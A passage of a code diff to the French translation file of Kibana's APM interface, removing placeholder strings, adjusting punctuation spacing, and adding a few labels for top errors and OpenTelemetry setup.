"xpack.apm.serviceMap.noServicesPromptDescription": "Nous ne parvenons pas à trouver des services à mapper dans la plage temporelle et l'environnement actuellement sélectionnés. Veuillez essayer une autre plage ou vérifier l'environnement sélectionné. Si vous ne disposez d'aucun service, utilisez nos instructions de configuration pour vous aider à vous lancer.", "xpack.apm.serviceMap.noServicesPromptTitle": "Aucun service disponible", "xpack.apm.serviceMap.popover.noDataText": "Aucune donnée pour l'environnement sélectionné. Essayez de passer à un autre environnement.", - "xpack.apm.serviceMap.resourceCountLabel": "{count} ressources", "xpack.apm.serviceMap.serviceDetailsButtonText": "Détails du service", "xpack.apm.serviceMap.subtypePopoverStat": "Sous-type", "xpack.apm.serviceMap.timeoutPrompt.docsLink": "En savoir plus sur les paramètres APM dans la documentation", @@ -8020,7 +7298,6 @@ "xpack.apm.serviceNodeMetrics.host": "Hôte", "xpack.apm.serviceNodeMetrics.serviceName": "Nom de service", "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningDocumentationLink": "documentation du serveur APM", - "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningText": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème. Pour plus d'informations sur la mise à niveau, consultez {link}. Vous pouvez également utiliser la barre de recherche de Kibana pour filtrer par nom d'hôte, par ID de conteneur ou en fonction d'autres champs.", "xpack.apm.serviceNodeMetrics.unidentifiedServiceNodesWarningTitle": "Impossible d'identifier les JVM", "xpack.apm.serviceNodeNameMissing": "(vide)", "xpack.apm.serviceOverview.coldstartHelp": "Le taux de démarrage à froid indique le pourcentage de demandes qui déclenchent un démarrage à froid d'une fonction sans serveur.", @@ -8080,10 +7357,9 @@ "xpack.apm.servicesGroups.filter": "Groupes de filtres", "xpack.apm.servicesGroups.loadingServiceGroups": "Chargement des groupes de services", "xpack.apm.servicesTable.environmentColumnLabel": "Environnement", - "xpack.apm.servicesTable.environmentCount": "{environmentCount, plural, one {1 environnement} other {# environnements}}", "xpack.apm.servicesTable.healthColumnLabel": "Intégrité", "xpack.apm.servicesTable.latencyAvgColumnLabel": "Latence (moy.)", - "xpack.apm.servicesTable.metricsExplanationLabel": "Que sont ces indicateurs ?", + "xpack.apm.servicesTable.metricsExplanationLabel": "Que sont ces indicateurs ?", "xpack.apm.servicesTable.nameColumnLabel": "Nom", "xpack.apm.servicesTable.notFoundLabel": "Aucun service trouvé", "xpack.apm.servicesTable.throughputColumnLabel": "Rendement", @@ -8096,21 +7372,18 @@ "xpack.apm.settings.agentKeys": "Clés d'agent", "xpack.apm.settings.agentKeys.agentKeysErrorPromptTitle": "Impossible de charger les clés de l'agent APM.", "xpack.apm.settings.agentKeys.agentKeysLoadingPromptTitle": "Chargement des clés de l'agent APM...", - "xpack.apm.settings.agentKeys.apiKeysDisabledErrorDescription": "Contactez votre administrateur système et reportez-vous aux {link} pour activer les clés d'API.", "xpack.apm.settings.agentKeys.apiKeysDisabledErrorLinkText": "documents", "xpack.apm.settings.agentKeys.apiKeysDisabledErrorTitle": "Clés d'API non activées dans Elasticsearch", "xpack.apm.settings.agentKeys.copyAgentKeyField.agentKeyLabel": "Clé de l'agent APM", "xpack.apm.settings.agentKeys.copyAgentKeyField.copyButton": "Copier dans le presse-papiers", "xpack.apm.settings.agentKeys.copyAgentKeyField.message": "Copiez cette clé maintenant. Vous ne pourrez plus la visualiser à nouveau.", - "xpack.apm.settings.agentKeys.copyAgentKeyField.title": "Création de la clé \"{name}\" effectuée", - "xpack.apm.settings.agentKeys.crate.failed": "Erreur lors de la création de la clé de l'agent APM \"{keyName}\". Erreur : \"{message}\"", "xpack.apm.settings.agentKeys.createAgentKeyButton": "Créer une clé d'agent APM", "xpack.apm.settings.agentKeys.createKeyFlyout.agentConfigHelpText": "Requis pour que les agents puissent lire la configuration des agents à distance.", "xpack.apm.settings.agentKeys.createKeyFlyout.cancelButton": "Annuler", "xpack.apm.settings.agentKeys.createKeyFlyout.createAgentKey": "Créer une clé d'agent APM", "xpack.apm.settings.agentKeys.createKeyFlyout.ingestAgentEvents": "Requis pour l'ingestion d'événements.", "xpack.apm.settings.agentKeys.createKeyFlyout.name.placeholder": "Entrer un nom", - "xpack.apm.settings.agentKeys.createKeyFlyout.nameHelpText": "Quelle est l'utilisation de cette clé ?", + "xpack.apm.settings.agentKeys.createKeyFlyout.nameHelpText": "Quelle est l'utilisation de cette clé ?", "xpack.apm.settings.agentKeys.createKeyFlyout.namePlaceholder": "Par exemple, apm-key", "xpack.apm.settings.agentKeys.createKeyFlyout.nameTitle": "Nom", "xpack.apm.settings.agentKeys.createKeyFlyout.privilegesFieldset": "Attribuer des privilèges", @@ -8118,12 +7391,9 @@ "xpack.apm.settings.agentKeys.createKeyFlyout.userTitle": "Utilisateur", "xpack.apm.settings.agentKeys.deleteConfirmModal.cancel": "Annuler", "xpack.apm.settings.agentKeys.deleteConfirmModal.delete": "Supprimer", - "xpack.apm.settings.agentKeys.deleteConfirmModal.title": "Supprimer la clé de l'agent APM \"{name}\" ?", "xpack.apm.settings.agentKeys.descriptionText": "Afficher et supprimer les clés de l'agent APM. Une clé de l'agent APM envoie des demandes de la part d'un utilisateur.", "xpack.apm.settings.agentKeys.emptyPromptBody": "Créez des clés d'agent APM pour autoriser les demandes d'agent APM au serveur APM.", "xpack.apm.settings.agentKeys.emptyPromptTitle": "Créer votre première clé", - "xpack.apm.settings.agentKeys.invalidate.failed": "Erreur lors de la suppression de la clé de l'agent APM \"{name}\"", - "xpack.apm.settings.agentKeys.invalidate.succeeded": "Suppression de la clé de l'agent APM \"{name}\"", "xpack.apm.settings.agentKeys.noPermissionToManagelApiKeysDescription": "Contactez votre administrateur système", "xpack.apm.settings.agentKeys.noPermissionToManagelApiKeysTitle": "Vous devez disposer d'une autorisation pour gérer les clés d'API", "xpack.apm.settings.agentKeys.table.creationColumnName": "Créé", @@ -8153,44 +7423,38 @@ "xpack.apm.settings.anomalyDetection.jobList.failedFetchText": "Impossible de récupérer les tâches de détection des anomalies.", "xpack.apm.settings.anomalyDetection.jobList.legacyStatusLabel": "Hérité", "xpack.apm.settings.anomalyDetection.jobList.manageMlJobsButtonText": "Gérer les tâches", - "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText": "Pour ajouter la détection des anomalies à un nouvel environnement, créez une tâche de Machine Learning. Vous pouvez gérer les tâches de Machine Learning existantes dans {mlJobsLink}.", "xpack.apm.settings.anomalyDetection.jobList.mlDescriptionText.mlJobsLinkText": "Machine Learning", "xpack.apm.settings.anomalyDetection.jobList.mlJobLinkText": "Gérer la tâche", "xpack.apm.settings.anomalyDetection.jobList.okStatusLabel": "OK", - "xpack.apm.settings.anomalyDetection.jobList.openAnomalyExplorerrLinkText": "Ouvrir dans Anomaly Explorer", + "xpack.apm.settings.anomalyDetection.jobList.openAnomalyExplorerrLinkText": "Ouvrir dans Anomaly Explorer", "xpack.apm.settings.anomalyDetection.jobList.showLegacyJobsCheckboxText": "Afficher les tâches héritées", "xpack.apm.settings.anomalyDetection.jobList.warningStatusBadgeLabel": "Avertissement", "xpack.apm.settings.anomalyDetection.jobList.warningStatusLabel": "Il est possible que la tâche rencontre des problèmes. Cliquez sur le lien Gérer les tâches pour en savoir plus.", "xpack.apm.settings.apmIndices.applyButton": "Appliquer les modifications", - "xpack.apm.settings.apmIndices.applyChanges.failed.text": "Un problème est survenu lors de l'application des index. Erreur : {errorMessage}", "xpack.apm.settings.apmIndices.applyChanges.failed.title": "Impossible d'appliquer les index.", "xpack.apm.settings.apmIndices.applyChanges.succeeded.text": "Les modifications apportées aux index ont été correctement appliquées. Ces modifications sont immédiatement appliquées dans l'interface utilisateur APM", "xpack.apm.settings.apmIndices.applyChanges.succeeded.title": "Index appliqués", "xpack.apm.settings.apmIndices.cancelButton": "Annuler", "xpack.apm.settings.apmIndices.description": "L'interface utilisateur APM utilise des vues de données pour interroger vos indices APM. Si vous avez personnalisé les noms des index sur lesquels le serveur APM écrit les événements, vous devrez peut-être mettre à jour ces modèles pour que l'interface utilisateur APM fonctionne. Dans ce cas précis, les paramètres prévalent sur ceux définis dans kibana.yml.", "xpack.apm.settings.apmIndices.errorIndicesLabel": "Index des erreurs", - "xpack.apm.settings.apmIndices.helpText": "Remplace {configurationName} : {defaultValue}", "xpack.apm.settings.apmIndices.metricsIndicesLabel": "Index des indicateurs", "xpack.apm.settings.apmIndices.noPermissionTooltipLabel": "Votre rôle d'utilisateur ne dispose pas d'autorisations pour changer les index APM", "xpack.apm.settings.apmIndices.onboardingIndicesLabel": "Intégration des index", "xpack.apm.settings.apmIndices.sourcemapIndicesLabel": "Index des source maps", - "xpack.apm.settings.apmIndices.spaceDescription": "Les paramètres des index s'appliquent à l'espace {spaceName}.", "xpack.apm.settings.apmIndices.spanIndicesLabel": "Index des intervalles", "xpack.apm.settings.apmIndices.title": "Index", "xpack.apm.settings.apmIndices.transactionIndicesLabel": "Index des transactions", "xpack.apm.settings.createApmPackagePolicy.errorToast.title": "Impossible de créer une politique de package APM sur la politique d'agent cloud", "xpack.apm.settings.customizeApp": "Liens personnalisés", "xpack.apm.settings.customLink": "Liens personnalisés", - "xpack.apm.settings.customLink.create.failed": "Impossible d'enregistrer le lien !", - "xpack.apm.settings.customLink.create.failed.message": "Un problème est survenu lors de l'enregistrement du lien. Erreur : \"{errorMessage}\"", - "xpack.apm.settings.customLink.create.successed": "Lien enregistré !", + "xpack.apm.settings.customLink.create.failed": "Impossible d'enregistrer le lien !", + "xpack.apm.settings.customLink.create.successed": "Lien enregistré !", "xpack.apm.settings.customLink.createCustomLink": "Créer un lien personnalisé", "xpack.apm.settings.customLink.default.label": "Elastic.co", "xpack.apm.settings.customLink.default.url": "https://www.elastic.co", "xpack.apm.settings.customLink.delete": "Supprimer", "xpack.apm.settings.customLink.delete.failed": "Impossible de supprimer le lien personnalisé", "xpack.apm.settings.customLink.delete.successed": "Lien personnalisé supprimé.", - "xpack.apm.settings.customLink.emptyPromptText": "Nous allons y remédier ! Vous pouvez ajouter des liens personnalisés au menu Actions à partir des détails de transaction de chaque service. Créez un lien utile vers le portail d'assistance de votre société, ou ouvrez un rapport de bug. Besoin d'autres idées ? Consultez {customLinkDocLinkText}.", "xpack.apm.settings.customLink.emptyPromptText.customLinkDocLinkText": "documents", "xpack.apm.settings.customLink.emptyPromptTitle": "Aucun lien trouvé.", "xpack.apm.settings.customLink.flyout.action.title": "Lien", @@ -8208,17 +7472,15 @@ "xpack.apm.settings.customLink.flyout.link.label.placeholder": "Par ex., tickets d'assistance", "xpack.apm.settings.customLink.flyout.link.url": "URL", "xpack.apm.settings.customLink.flyout.link.url.doc": "Découvrez plus d'informations dans la documentation.", - "xpack.apm.settings.customLink.flyout.link.url.helpText": "Ajoutez les variables des noms de champ à votre URL pour appliquer des valeurs, par ex., {sample}.", "xpack.apm.settings.customLink.flyout.link.url.placeholder": "par ex., https://www.elastic.co/fr/", "xpack.apm.settings.customLink.flyout.required": "Requis", "xpack.apm.settings.customLink.flyout.save": "Enregistrer", "xpack.apm.settings.customLink.flyout.title": "Créer un lien", "xpack.apm.settings.customLink.info": "Ces liens seront affichés dans le menu contextuel Actions, dans des zones sélectionnées de l'application, par ex., par détail de transaction.", - "xpack.apm.settings.customLink.license.text": "Pour créer des liens personnalisés, vous devez disposer d'une licence Elastic Gold ou supérieure. Elle vous permet de créer des liens personnalisés pour améliorer votre workflow lors de l'analyse de vos services.", + "xpack.apm.settings.customLink.license.text": "Pour créer des liens personnalisés, vous devez disposer d'une licence Elastic Gold ou supérieure. Elle vous permet de créer des liens personnalisés pour améliorer votre workflow lors de l'analyse de vos services.", "xpack.apm.settings.customLink.linkPreview.descrition": "Testez votre lien avec des valeurs tirées d'un document d'exemple de transaction avec les filtres ci-dessus.", "xpack.apm.settings.customLink.noPermissionTooltipLabel": "Votre rôle d'utilisateur ne dispose pas d'autorisations pour créer des liens personnalisés", "xpack.apm.settings.customLink.preview.contextVariable.invalid": "Nous n'avons pas trouvé de document d'exemple de transaction car les variables définies ne sont pas valides.", - "xpack.apm.settings.customLink.preview.contextVariable.noMatch": "Nous n'avons pas trouvé de valeur correspondante pour {variables} dans le document d'exemple de transaction.", "xpack.apm.settings.customLink.preview.transaction.notFound": "Nous n'avons pas trouvé de document de transaction correspondant avec les filtres définis.", "xpack.apm.settings.customLink.previewSectionTitle": "Aperçu", "xpack.apm.settings.customLink.searchInput.filter": "Filtrer les liens par nom et URL…", @@ -8226,7 +7488,6 @@ "xpack.apm.settings.customLink.table.editButtonLabel": "Modifier", "xpack.apm.settings.customLink.table.lastUpdated": "Dernière mise à jour", "xpack.apm.settings.customLink.table.name": "Nom", - "xpack.apm.settings.customLink.table.noResultFound": "Pas de résultats pour \"{value}\".", "xpack.apm.settings.customLink.table.url": "URL", "xpack.apm.settings.indices": "Index", "xpack.apm.settings.schema": "Schéma", @@ -8239,11 +7500,9 @@ "xpack.apm.settings.schema.confirm.title": "Veuillez confirmer votre choix", "xpack.apm.settings.schema.confirm.unsupportedConfigs.descriptionText": "Les paramètres utilisateur apm-server.yml personnalisés compatibles seront déplacés vers le serveur Fleet à votre place. Nous vous informerons des paramètres incompatibles avant de les supprimer.", "xpack.apm.settings.schema.confirm.unsupportedConfigs.title": "Les paramètres utilisateur apm-server.yml suivants sont incompatibles et seront supprimés", - "xpack.apm.settings.schema.descriptionText": "Nous avons créé un processus simple et transparent pour passer du binaire du serveur APM à Elastic Agent. Attention, il s'agit d'une action {irreversibleEmphasis} qui ne peut être réalisée que par un {superuserEmphasis} bénéficiant d'un accès à Fleet. En savoir plus sur {elasticAgentDocLink}.", - "xpack.apm.settings.schema.descriptionText.elasticAgentDocLinkText": "Elastic Agent", + "xpack.apm.settings.schema.descriptionText.elasticAgentDocLinkText": "Elastic Agent", "xpack.apm.settings.schema.descriptionText.irreversibleEmphasisText": "irréversible", "xpack.apm.settings.schema.descriptionText.superuserEmphasisText": "superutilisateur", - "xpack.apm.settings.schema.disabledReason": "L'option Passer à Elastic Agent n'est pas disponible : {reasons}", "xpack.apm.settings.schema.disabledReason.cloudApmMigrationEnabled": "La migration vers le cloud n'est pas activée", "xpack.apm.settings.schema.disabledReason.hasCloudAgentPolicy": "La politique d'agent cloud n'existe pas", "xpack.apm.settings.schema.disabledReason.hasRequiredRole": "L'utilisateur ne dispose pas du rôle de superutilisateur", @@ -8252,26 +7511,22 @@ "xpack.apm.settings.schema.migrate.classicIndices.title": "Binaire du serveur APM", "xpack.apm.settings.schema.migrate.dataStreams.buttonText": "Passer à Elastic Agent", "xpack.apm.settings.schema.migrate.dataStreams.description": "À partir de la version 8.0, il est recommandé de gérer le serveur APM avec Elastic Agent. Elastic Agent peut fonctionner sur notre service hébergé Elasticsearch, ECE, ou être autogéré. Ensuite, ajoutez l'intégration Elastic APM pour continuer à ingérer des données APM.", - "xpack.apm.settings.schema.migrate.dataStreams.title": "Elastic Agent", + "xpack.apm.settings.schema.migrate.dataStreams.title": "Elastic Agent", "xpack.apm.settings.schema.migrationInProgressPanelDescription": "Nous créons actuellement une instance de serveur Fleet pour contenir le nouveau serveur APM pendant la fermeture de l'ancienne instance du serveur APM. Dans quelques minutes, vous devriez voir vos données réintégrer l'application.", "xpack.apm.settings.schema.migrationInProgressPanelTitle": "En cours de transition vers Elastic Agent...", "xpack.apm.settings.schema.success.description": "Votre intégration APM est à présent configurée et prête à recevoir des données de vos agents actuellement instrumentés. N'hésitez pas à consulter les politiques appliquées à votre intégration.", - "xpack.apm.settings.schema.success.returnText": "ou revenez simplement à l'{serviceInventoryLink}.", "xpack.apm.settings.schema.success.returnText.serviceInventoryLink": "Inventaire de service", - "xpack.apm.settings.schema.success.title": "Elastic Agent a bien été configuré !", + "xpack.apm.settings.schema.success.title": "Elastic Agent a bien été configuré !", "xpack.apm.settings.schema.success.viewIntegrationInFleet.buttonText": "Afficher l'intégration APM dans Fleet", "xpack.apm.settings.schema.upgradeAvailable.title": "Mise à niveau de l'intégration APM disponible !", "xpack.apm.settings.schema.upgradeAvailable.upgradePackagePolicyLink": "Mettre à niveau votre intégration APM", "xpack.apm.settings.title": "Paramètres", "xpack.apm.settings.unsupportedConfigs.errorToast.title": "Impossible de récupérer les paramètres du serveur APM", - "xpack.apm.settings.upgradeAvailable.description": "Même si votre intégration APM est configurée, une nouvelle version de l'intégration APM est disponible pour une mise à niveau avec votre stratégie de package. Consultez {upgradePackagePolicyLink} pour tirer le meilleur parti de votre configuration.", "xpack.apm.settingsLinkLabel": "Paramètres", "xpack.apm.setupInstructionsButtonLabel": "Instructions de configuration", "xpack.apm.spanLinks.callout.description": "Un lien est un pointeur allant de l'intervalle actuel vers un autre intervalle de la même trace ou d'une trace différente. Par exemple, vous pouvez l'utiliser dans des opérations de mise en lots, où un gestionnaire de lot unique traite plusieurs requêtes de différentes traces ou lorsque le gestionnaire reçoit une requête d'un autre projet.", "xpack.apm.spanLinks.callout.dimissButton": "Rejeter", "xpack.apm.spanLinks.callout.title": "Liens d'intervalle", - "xpack.apm.spanLinks.combo.childrenLinks": "Liens entrants ({linkedChildren})", - "xpack.apm.spanLinks.combo.parentsLinks": "Liens sortants ({linkedParents})", "xpack.apm.spanLinks.table.actions.copyParentTraceId": "Copier l'ID de trace parente", "xpack.apm.spanLinks.table.actions.copySpanId": "Copier l'ID d'intervalle", "xpack.apm.spanLinks.table.actions.goToSpanDetails": "Accéder aux détails d'intervalle", @@ -8281,7 +7536,6 @@ "xpack.apm.spanLinks.table.span": "Intervalle", "xpack.apm.spanLinks.table.spanDuration": "Durée d'intervalle", "xpack.apm.stacktraceTab.causedByFramesToogleButtonLabel": "Provoqué par", - "xpack.apm.stacktraceTab.libraryFramesToogleButtonLabel": "{count, plural, one {# cadre de bibliothèque} other {# cadres de bibliothèque}}", "xpack.apm.stacktraceTab.localVariablesToogleButtonLabel": "Variables locales", "xpack.apm.stacktraceTab.noStacktraceAvailableLabel": "Aucune trace de pile disponible.", "xpack.apm.technicalPreviewBadgeDescription": "Cette fonctionnalité est en version d'évaluation technique et pourra être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités en version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale.", @@ -8332,9 +7586,8 @@ "xpack.apm.transactionDetails.coldstartBadge": "démarrage à froid", "xpack.apm.transactionDetails.distribution.failedTransactionsLatencyDistributionErrorTitle": "Une erreur s'est produite lors de la récupération de la distribution de la latence des transactions ayant échoué.", "xpack.apm.transactionDetails.distribution.latencyDistributionErrorTitle": "Une erreur s'est produite lors de la récupération de la distribution de la latence globale.", - "xpack.apm.transactionDetails.errorCount": "{errorCount, number} {errorCount, plural, one {erreur} other {erreurs}}", "xpack.apm.transactionDetails.noTraceParentButtonTooltip": "Le parent de la trace n'a pas pu être trouvé", - "xpack.apm.transactionDetails.percentOfTraceLabelExplanation": "Le % de {parentType, select, transaction {transaction} trace {trace} } dépasse 100 %, car {childType, select, span {cet intervalle} transaction {cette transaction} } prend plus de temps que la transaction racine.", + "xpack.apm.transactionDetails.percentOfTraceLabelExplanation": "Le % de {parentType, select, transaction {transaction} trace {trace} } dépasse 100 %, car {childType, select, span {cet intervalle} transaction {cette transaction} } prend plus de temps que la transaction racine.", "xpack.apm.transactionDetails.requestMethodLabel": "Méthode de requête", "xpack.apm.transactionDetails.resultLabel": "Résultat", "xpack.apm.transactionDetails.serviceLabel": "Service", @@ -8357,10 +7610,13 @@ "xpack.apm.transactionDetails.tabs.failedTransactionsCorrelationsLabel": "Corrélations des transactions ayant échoué", "xpack.apm.transactionDetails.tabs.latencyLabel": "Corrélations de latence", "xpack.apm.transactionDetails.tabs.traceSamplesLabel": "Échantillons de traces", + "xpack.apm.transactionDetails.topErrors.errorMessage": "Impossible de récupérer les erreurs", + "xpack.apm.transactionDetails.topErrors.loading": "Chargement...", + "xpack.apm.transactionDetails.topErrors.noResults": "Aucune erreur trouvée pour ce groupe de transactions", + "xpack.apm.transactionDetails.topErrors.title": "5 principales erreurs", "xpack.apm.transactionDetails.traceNotFound": "La trace sélectionnée n'a pas pu être trouvée", "xpack.apm.transactionDetails.traceSampleTitle": "Échantillon de trace", "xpack.apm.transactionDetails.transactionLabel": "Transaction", - "xpack.apm.transactionDetails.transFlyout.callout.agentDroppedSpansMessage": "L'agent APM qui a signalé cette transaction a abandonné {dropped} intervalles ou plus, d'après sa configuration.", "xpack.apm.transactionDetails.transFlyout.callout.learnMoreAboutDroppedSpansLinkText": "Découvrir plus d'informations sur les intervalles abandonnés.", "xpack.apm.transactionDetails.transFlyout.transactionDetailsTitle": "Détails de la transaction", "xpack.apm.transactionDetails.userAgentAndVersionLabel": "Agent utilisateur et version", @@ -8378,11 +7634,9 @@ "xpack.apm.transactionDurationLabel": "Durée", "xpack.apm.transactionErrorRateAlert.name": "Seuil du taux de transactions ayant échoué", "xpack.apm.transactionErrorRateAlertTrigger.isAbove": "est supérieur à", - "xpack.apm.transactionRateLabel": "{displayedValue} tpm", "xpack.apm.transactions.latency.chart.95thPercentileLabel": "95e centile", "xpack.apm.transactions.latency.chart.99thPercentileLabel": "99e centile", "xpack.apm.transactions.latency.chart.averageLabel": "Moyenne", - "xpack.apm.transactionsTable.cardinalityWarning.body": "Le nombre de noms de transactions uniques dépasse la valeur configurée de {bucketSize}. Essayez de reconfigurer vos agents de façon à regrouper les transactions similaires ou augmentez la valeur de {codeBlock}", "xpack.apm.transactionsTable.cardinalityWarning.docsLink": "En savoir plus dans la documentation", "xpack.apm.transactionsTable.cardinalityWarning.title": "Cette vue présente un sous-ensemble de transactions signalées.", "xpack.apm.transactionsTable.errorMessage": "Impossible de récupérer", @@ -8402,140 +7656,117 @@ "xpack.apm.tutorial.apmAgents.statusCheck.text": "Vérifiez que votre application est en cours d'exécution et que les agents envoient les données.", "xpack.apm.tutorial.apmAgents.statusCheck.title": "Statut de l'agent", "xpack.apm.tutorial.apmAgents.title": "Agents APM", - "xpack.apm.tutorial.apmServer.callOut.message": "Assurez-vous de mettre à jour votre serveur APM vers la version 7.0 ou supérieure. Vous pouvez également migrer vos données 6.x à l'aide de l'assistant de migration disponible dans la section de gestion de Kibana.", - "xpack.apm.tutorial.apmServer.callOut.title": "Important : mise à niveau vers la version 7.0 ou supérieure", + "xpack.apm.tutorial.apmServer.callOut.message": "Assurez-vous de mettre à jour votre serveur APM vers la version 7.0 ou supérieure. Vous pouvez également migrer vos données 6.x à l'aide de l'assistant de migration disponible dans la section de gestion de Kibana.", + "xpack.apm.tutorial.apmServer.callOut.title": "Important : mise à niveau vers la version 7.0 ou supérieure", "xpack.apm.tutorial.apmServer.fleet.apmIntegration.button": "Intégration APM", "xpack.apm.tutorial.apmServer.fleet.apmIntegration.description": "Fleet vous permet de gérer de manière centralisée les agents Elastic qui exécutent l'intégration APM. L'option par défaut consiste à installer un serveur Fleet sur un hôte dédié. Pour les configurations sans hôte dédié, nous vous recommandons de suivre les instructions pour installer le serveur APM autonome pour votre système d'exploitation en sélectionnant l'onglet correspondant ci-dessus.", "xpack.apm.tutorial.apmServer.fleet.manageApmIntegration.button": "Gérer l'intégration APM dans Fleet", "xpack.apm.tutorial.apmServer.fleet.message": "L'intégration d'APM installe les modèles Elasticsearch et les pipelines d'ingestion pour les données APM.", - "xpack.apm.tutorial.apmServer.fleet.title": "Elastic APM est maintenant disponible dans Fleet !", + "xpack.apm.tutorial.apmServer.fleet.title": "Elastic APM est maintenant disponible dans Fleet !", "xpack.apm.tutorial.apmServer.statusCheck.btnLabel": "Vérifier le statut du serveur APM", - "xpack.apm.tutorial.apmServer.statusCheck.errorMessage": "Aucun serveur APM détecté. Vérifiez qu'il est en cours d'exécution et que vous avez effectué la mise à jour vers la version 7.0 ou supérieure.", + "xpack.apm.tutorial.apmServer.statusCheck.errorMessage": "Aucun serveur APM détecté. Vérifiez qu'il est en cours d'exécution et que vous avez effectué la mise à jour vers la version 7.0 ou supérieure.", "xpack.apm.tutorial.apmServer.statusCheck.successMessage": "Vous avez correctement configuré le serveur APM", "xpack.apm.tutorial.apmServer.statusCheck.text": "Vérifiez que le serveur APM est en cours d'exécution avant de commencer à mettre en œuvre les agents APM.", "xpack.apm.tutorial.apmServer.statusCheck.title": "Statut du serveur APM", - "xpack.apm.tutorial.apmServer.title": "Serveur APM", + "xpack.apm.tutorial.apmServer.title": "Serveur APM", + "xpack.apm.tutorial.config_otel.column.configSettings": "Paramètre de configuration (1)", + "xpack.apm.tutorial.config_otel.column.configValue": "Valeur de configuration", + "xpack.apm.tutorial.config_otel.column.notes": "Notes", + "xpack.apm.tutorial.config_otel.description2": "Les variables d’environnement 'OTEL_METRICS_EXPORTER` et 'OTEL_LOGS_EXPORTER' peuvent ne pas être prises en charge par certains SDK.", + "xpack.apm.tutorial.config_otel.instrumentationGuide": "Guide de l’Instrumentation OpenTelemetry", "xpack.apm.tutorial.djangoClient.configure.commands.addAgentComment": "Ajouter l'agent aux applications installées", - "xpack.apm.tutorial.djangoClient.configure.commands.addTracingMiddlewareComment": "Pour envoyer les indicateurs de performance, ajoutez notre intergiciel de traçage :", + "xpack.apm.tutorial.djangoClient.configure.commands.addTracingMiddlewareComment": "Pour envoyer les indicateurs de performance, ajoutez notre intergiciel de traçage :", "xpack.apm.tutorial.djangoClient.configure.commands.allowedCharactersComment": "a-z, A-Z, 0-9, -, _ et espace", - "xpack.apm.tutorial.djangoClient.configure.commands.setCustomApmServerUrlComment": "Définir l'URL personnalisée du serveur APM (par défaut : {defaultApmServerUrl})", - "xpack.apm.tutorial.djangoClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", + "xpack.apm.tutorial.djangoClient.configure.commands.setRequiredServiceNameComment": "Définissez le nom de service obligatoire. Caractères autorisés :", "xpack.apm.tutorial.djangoClient.configure.commands.setServiceEnvironmentComment": "Définir l'environnement de service", "xpack.apm.tutorial.djangoClient.configure.commands.useIfApmServerRequiresTokenComment": "À utiliser si le serveur APM requiert un token secret", - "xpack.apm.tutorial.djangoClient.configure.textPost": "Consultez la [documentation]({documentationLink}) pour une utilisation avancée.", "xpack.apm.tutorial.djangoClient.configure.textPre": "Les agents sont des bibliothèques exécutées dans les processus de votre application. Les services APM sont créés par programmation à partir du \"SERVICE_NAME\".", "xpack.apm.tutorial.djangoClient.configure.title": "Configurer l'agent", "xpack.apm.tutorial.djangoClient.install.textPre": "Installez l'agent APM pour Python en tant que dépendance.", "xpack.apm.tutorial.djangoClient.install.title": "Installer l'agent APM", - "xpack.apm.tutorial.dotNetClient.configureAgent.textPost": "Si vous ne transférez pas une instance \"IConfiguration\" à l'agent (par ex., pour les applications non ASP.NET Core) vous pouvez également configurer l'agent par le biais de variables d'environnement. \n Consultez [the documentation]({documentationLink}) pour une utilisation avancée.", - "xpack.apm.tutorial.dotNetClient.configureAgent.title": "Exemple de fichier appsettings.json :", + "xpack.apm.tutorial.dotNetClient.configureAgent.title": "Exemple de fichier appsettings.json :", "xpack.apm.tutorial.dotNetClient.configureApplication.textPost": "La transmission d'une instance \"IConfiguration\" est facultative mais si cette opération est effectuée, l'agent lira les paramètres de configuration depuis cette instance \"IConfiguration\" (par ex. à partir du fichier \"appsettings.json\").", "xpack.apm.tutorial.dotNetClient.configureApplication.textPre": "Si vous utilisez ASP.NET Core avec le package \"Elastic.Apm.NetCoreAll\", appelez la méthode \"UseAllElasticApm\" dans la méthode \"Configure\" dans le fichier \"Startup.cs\".", "xpack.apm.tutorial.dotNetClient.configureApplication.title": "Ajouter l'agent à l'application", - "xpack.apm.tutorial.dotNetClient.download.textPre": "Ajoutez le(s) package(s) d'agent depuis [NuGet]({allNuGetPackagesLink}) à votre application .NET. Plusieurs packages NuGet sont disponibles pour différents cas d'utilisation. \n\nPour une application ASP.NET Core avec Entity Framework Core, téléchargez le package [Elastic.Apm.NetCoreAll]({netCoreAllApmPackageLink}). Ce package ajoutera automatiquement chaque composant d'agent à votre application. \n\n Si vous souhaitez minimiser les dépendances, vous pouvez utiliser le package [Elastic.Apm.AspNetCore]({aspNetCorePackageLink}) uniquement pour le monitoring d'ASP.NET Core ou le package [Elastic.Apm.EfCore]({efCorePackageLink}) uniquement pour le monitoring d'Entity Framework Core. \n\n Si vous souhaitez seulement utiliser l'API d'agent publique pour l'instrumentation manuelle, utilisez le package [Elastic.Apm]({elasticApmPackageLink}).", "xpack.apm.tutorial.dotNetClient.download.title": "Télécharger l'agent APM", "xpack.apm.tutorial.downloadServer.title": "Télécharger et décompresser le serveur APM", - "xpack.apm.tutorial.downloadServerRpm": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", - "xpack.apm.tutorial.downloadServerTitle": "Vous cherchez les packages 32 bits ? Consultez la [Download page]({downloadPageLink}).", - "xpack.apm.tutorial.editConfig.textPre": "Si vous utilisez une version sécurisée X-Pack d'Elastic Stack, vous devez spécifier les informations d'identification dans le fichier de configuration \"apm-server.yml\".", + "xpack.apm.tutorial.editConfig.textPre": "Si vous utilisez une version sécurisée X-Pack d'Elastic Stack, vous devez spécifier les informations d'identification dans le fichier de configuration \"apm-server.yml\".", "xpack.apm.tutorial.editConfig.title": "Modifier la configuration", - "xpack.apm.tutorial.elasticCloud.textPre": "Pour activer le serveur APM, accédez à [the Elastic Cloud console] (https://cloud.elastic.co/deployments/{deploymentId}/edit) et activez APM et Fleet dans la page de modification du déploiement en cliquant sur Ajouter une capacité, puis cliquez sur Enregistrer. Une fois activé, actualisez la page.", "xpack.apm.tutorial.elasticCloudInstructions.title": "Agents APM", 